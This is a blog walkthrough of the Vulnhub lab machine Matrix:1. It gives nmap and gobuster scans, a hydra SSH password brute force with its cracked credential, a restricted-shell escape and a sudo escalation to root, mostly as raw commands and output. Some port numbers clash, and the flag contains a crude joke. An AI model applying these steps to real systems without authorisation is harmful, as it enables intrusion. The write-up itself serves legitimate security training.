Matrix:1 Vulnhub Walkthrough
September 25, 2020 by Nasef
Matrix:1 is a machine in which I used Enumeration to obtain shell access and then exploited the misconfigured sudo permissions to get root Access.
As always, I started scanning with Nmap
root@kali:/home/kali# nmap -sC -sV 192.168.198.139 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-25 00:30 EDT Nmap scan report for 192.168.198.139 Host is up (0.000096s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7 (protocol 2.0) | ssh-hostkey: | 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA) | 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA) |_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519) 80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) |_http-server-header: SimpleHTTP/0.6 Python/2.7.14 |_http-title: Welcome in Matrix 31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) |_http-title: Welcome in Matrix MAC Address: 00:0C:29:43:C6:92 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.96 seconds
Interesting two http services!
Then I enumerated directories and files using gobuster on both services but there is no useful information
root@kali:/home/kali# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.198.139 -x php,html,json,py,matrix =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.198.139 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: matrix,php,html,json,py [+] Timeout: 10s =============================================================== 2020/09/25 00:50:40 Starting gobuster =============================================================== /index.html (Status: 200) /assets (Status: 301) /80.py (Status: 200) [ERROR] 2020/09/25 00:51:41 [!] Get http://192.168.198.139/page22.php: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/25 00:59:13 [!] Get http://192.168.198.139/35921.php: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/25 01:00:48 [!] Get http://192.168.198.139/helpweb.html: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/25 01:02:08 [!] Get http://192.168.198.139/151871_1: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/25 01:02:09 [!] Get http://192.168.198.139/lang_ko.py: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/25 01:02:09 [!] Get http://192.168.198.139/28672.json: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/25 01:02:09 [!] Get http://192.168.198.139/inalambrico.py: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/25 01:07:53 [!] Get http://192.168.198.139/gisabm.php: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers) =============================================================== 2020/09/25 01:14:21 Finished ===============================================================
Nothing really important here.
So, I started digging in the http services in port 80 and 3117. I found a base64 encoded text while inspecting element on port 31337.
so I visted http://192.168.198.139:1337/Cypher.matrix , a filed was downloaded which contained this strange ciphertext
I used online crypto Identifier and the text was identified as Brainfuck Endcoding
So I used another online tool to decode the text
The text contains our password with missing two letters so I used an online combination maker and prefix adder to make my wordlist
Then I used hydra to bruteforce the ssh password
hydra -f -l guest -P Downloads/output.txt ssh://192.168.198.139 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-25 01:13:47 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 1296 login tries (l:1/p:1296), ~81 tries per task [DATA] attacking ssh://192.168.198.139:22/ [STATUS] 178.00 tries/min, 178 tries in 00:01h, 1120 to do in 00:07h, 16 active [STATUS] 166.00 tries/min, 498 tries in 00:03h, 800 to do in 00:05h, 16 active [STATUS] 153.29 tries/min, 1073 tries in 00:07h, 225 to do in 00:02h, 16 active [ssh] host: 192.168.198.139 login: guest password: k1ll0r7n [STATUS] attack finished for 192.168.198.139 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-25 01:21:21
When I sshed to the user guest, it gave me a restricted shell so I bypassed the restriction by using this command
root@kali:/home/kali# ssh firstname.lastname@example.org -t bash
I ran diffreent Enumeration scripts and found an intersting sudo privilege which allows us to run all commands
guest@porteus:/tmp$ sudo -l User guest may run the following commands on porteus: (ALL) ALL (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper (trinity) NOPASSWD: /bin/cp
guest@porteus:/tmp$ sudo su Password: root@porteus:/tmp# cat /root/flag.txt _,-. ,-' _| EVER REWIND OVER AND OVER AGAIN THROUGH THE |_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE |`-._\`.__ `_. IN THE MATRIX AND BEAT OFF |`-._`-.\,-'_| _,-'. `-.|.-' | |`.-'|_ WHAT | |_|,-'_`. |-._,-' | NO, ME NEITHER jrei | | _,' '-|_,-' IT'S JUST A HYPOTHETICAL QUESTION
and voila here is the root privilege!